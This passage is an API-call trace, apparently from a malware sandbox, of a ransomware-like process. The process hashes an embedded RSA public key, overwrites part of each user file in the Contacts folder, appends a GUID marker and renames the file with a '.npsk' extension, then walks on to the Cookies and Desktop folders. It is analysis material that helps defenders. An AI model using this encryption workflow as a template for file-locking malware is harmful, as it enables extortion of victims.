KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0212.926] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1f6) returned 0x7a79b8 [0212.926] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0212.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0212.927] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0212.928] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0212.928] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0212.928] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0212.928] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x11) returned 0x32728a8 [0212.928] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0212.928] GetLastError () returned 0x0 [0212.928] SetLastError (dwErrCode=0x0) [0212.928] GetLastError () returned 0x0 [0212.928] SetLastError (dwErrCode=0x0) [0212.928] GetLastError () returned 0x0 [0212.928] SetLastError (dwErrCode=0x0) [0212.928] GetLastError () returned 0x0 [0212.928] SetLastError (dwErrCode=0x0) [0212.928] GetLastError () returned 0x0 [0212.928] SetLastError (dwErrCode=0x0) [0212.928] GetLastError () returned 0x0 [0212.928] SetLastError (dwErrCode=0x0) [0212.928] GetLastError () returned 0x0 [0212.928] SetLastError (dwErrCode=0x0) [0212.928] GetLastError () returned 0x0 [0212.928] SetLastError (dwErrCode=0x0) [0212.928] GetLastError () returned 0x0 [0212.928] SetLastError (dwErrCode=0x0) [0212.928] GetLastError () returned 0x0 [0212.928] SetLastError (dwErrCode=0x0) [0212.928] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.929] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.929] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.929] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.929] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.929] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.929] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0212.929] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.929] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.929] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.929] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.929] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.929] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.929] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.929] GetLastError () returned 0x0 [0212.929] SetLastError (dwErrCode=0x0) [0212.930] GetLastError () returned 0x0 [0212.930] SetLastError (dwErrCode=0x0) [0212.930] GetLastError () returned 0x0 [0212.930] SetLastError (dwErrCode=0x0) [0212.930] GetLastError () returned 0x0 [0212.930] SetLastError (dwErrCode=0x0) [0212.930] GetLastError () returned 0x0 [0212.930] SetLastError (dwErrCode=0x0) [0212.930] GetLastError () returned 0x0 [0212.930] SetLastError (dwErrCode=0x0) [0212.930] GetLastError () returned 0x0 [0212.930] SetLastError (dwErrCode=0x0) [0212.930] GetLastError () returned 0x0 [0212.930] SetLastError (dwErrCode=0x0) [0212.930] GetLastError () returned 0x0 [0212.930] SetLastError (dwErrCode=0x0) [0212.930] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0212.930] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0212.930] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32728a8 | out: hHeap=0x750000) returned 1 [0212.930] CryptDestroyHash (hHash=0x3277d68) returned 1 [0212.930] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0212.930] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0212.930] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0212.930] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0212.930] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0212.930] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0212.930] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0212.931] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0212.931] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x4a0) returned 0x32ef680 [0212.931] SetFilePointer (in: hFile=0x61c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0212.931] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da90 | out: hHeap=0x750000) returned 1 [0212.931] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3225448, Size=0x218) returned 0x3a8af88 [0212.931] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x496, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.931] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0212.931] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0212.931] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0212.931] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0212.932] CloseHandle (hObject=0x61c) returned 1 [0212.939] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.npsk")) returned 1 [0212.940] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0212.940] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0212.940] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0212.941] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0212.941] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0212.942] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned=".contact" [0212.942] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0212.943] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=1172) returned 1 [0212.943] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0212.945] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x46e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.945] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.669] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x494, lpOverlapped=0x0) returned 1 [0214.669] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.669] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.669] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.669] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0214.670] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.670] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.670] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.670] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.670] GetLastError () returned 0x0 [0214.670] SetLastError (dwErrCode=0x0) [0214.670] GetLastError () returned 0x0 [0214.670] SetLastError (dwErrCode=0x0) [0214.670] GetLastError () returned 0x0 [0214.670] SetLastError (dwErrCode=0x0) [0214.670] GetLastError () returned 0x0 [0214.670] SetLastError (dwErrCode=0x0) [0214.670] GetLastError () returned 0x0 [0214.670] SetLastError (dwErrCode=0x0) [0214.670] GetLastError () returned 0x0 [0214.670] SetLastError (dwErrCode=0x0) [0214.671] GetLastError () returned 0x0 [0214.671] SetLastError (dwErrCode=0x0) [0214.671] GetLastError () returned 0x0 [0214.671] SetLastError (dwErrCode=0x0) [0214.671] GetLastError () returned 0x0 [0214.671] SetLastError (dwErrCode=0x0) [0214.671] GetLastError () returned 0x0 [0214.671] SetLastError (dwErrCode=0x0) [0214.671] GetLastError () returned 0x0 [0214.671] SetLastError (dwErrCode=0x0) [0214.671] GetLastError () returned 0x0 [0214.671] SetLastError (dwErrCode=0x0) [0214.671] GetLastError () returned 0x0 [0214.671] SetLastError (dwErrCode=0x0) [0214.671] GetLastError () returned 0x0 [0214.671] SetLastError (dwErrCode=0x0) [0214.671] GetLastError () returned 0x0 [0214.671] SetLastError (dwErrCode=0x0) [0214.671] GetLastError () returned 0x0 [0214.671] SetLastError (dwErrCode=0x0) [0214.671] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.671] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0214.671] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.671] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.671] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.671] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.671] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.672] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3225448, Size=0x218) returned 0x3a8af88 [0214.672] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x494, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.672] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.672] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.672] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.672] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.672] CloseHandle (hObject=0x61c) returned 1 [0214.674] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.npsk")) returned 1 [0214.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0214.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.675] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0214.676] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0214.676] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0214.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7c0000 | out: hHeap=0x750000) returned 1 [0214.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3240d78 | out: hHeap=0x750000) returned 1 [0214.676] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0214.676] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0214.677] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0214.677] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0214.677] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0214.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0214.677] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0214.677] PathFindFileNameW (pszPath="") returned="" [0214.677] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0214.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3241248 | out: hHeap=0x750000) returned 1 [0214.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7c0000 | out: hHeap=0x750000) returned 1 [0214.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3240d78 | out: hHeap=0x750000) returned 1 [0214.677] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0214.677] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0214.677] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0214.677] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0214.677] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0214.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0214.677] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0214.677] PathFindFileNameW (pszPath="") returned="" [0214.677] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xbe74d9e0, ftLastAccessTime.dwHighDateTime=0x1d5ff3b, ftLastWriteTime.dwLowDateTime=0xbe74d9e0, ftLastWriteTime.dwHighDateTime=0x1d5ff3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0214.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3241248 | out: hHeap=0x750000) returned 1 [0214.677] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xbe74d9e0, ftLastAccessTime.dwHighDateTime=0x1d5ff3b, ftLastWriteTime.dwLowDateTime=0xbe74d9e0, ftLastWriteTime.dwHighDateTime=0x1d5ff3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0214.678] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaabd8c80, ftCreationTime.dwHighDateTime=0x1d5ff3b, ftLastAccessTime.dwLowDateTime=0xaabd8c80, ftLastAccessTime.dwHighDateTime=0x1d5ff3b, ftLastWriteTime.dwLowDateTime=0xdc345900, ftLastWriteTime.dwHighDateTime=0x1d5ff37, nFileSizeHigh=0x0, nFileSizeLow=0xb1400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1A3E.TMP.EXE.exe", cAlternateFileName="1A3ETM~1.EXE")) returned 1 [0214.678] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe") returned=".exe" [0214.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1a3e.tmp.exe.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.678] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=726016) returned 1 [0214.678] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.680] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb13da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.680] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.681] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0214.681] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x25805, lpOverlapped=0x0) returned 1 [0214.684] lstrlenA (lpString="-----BEGIN PUBLIC 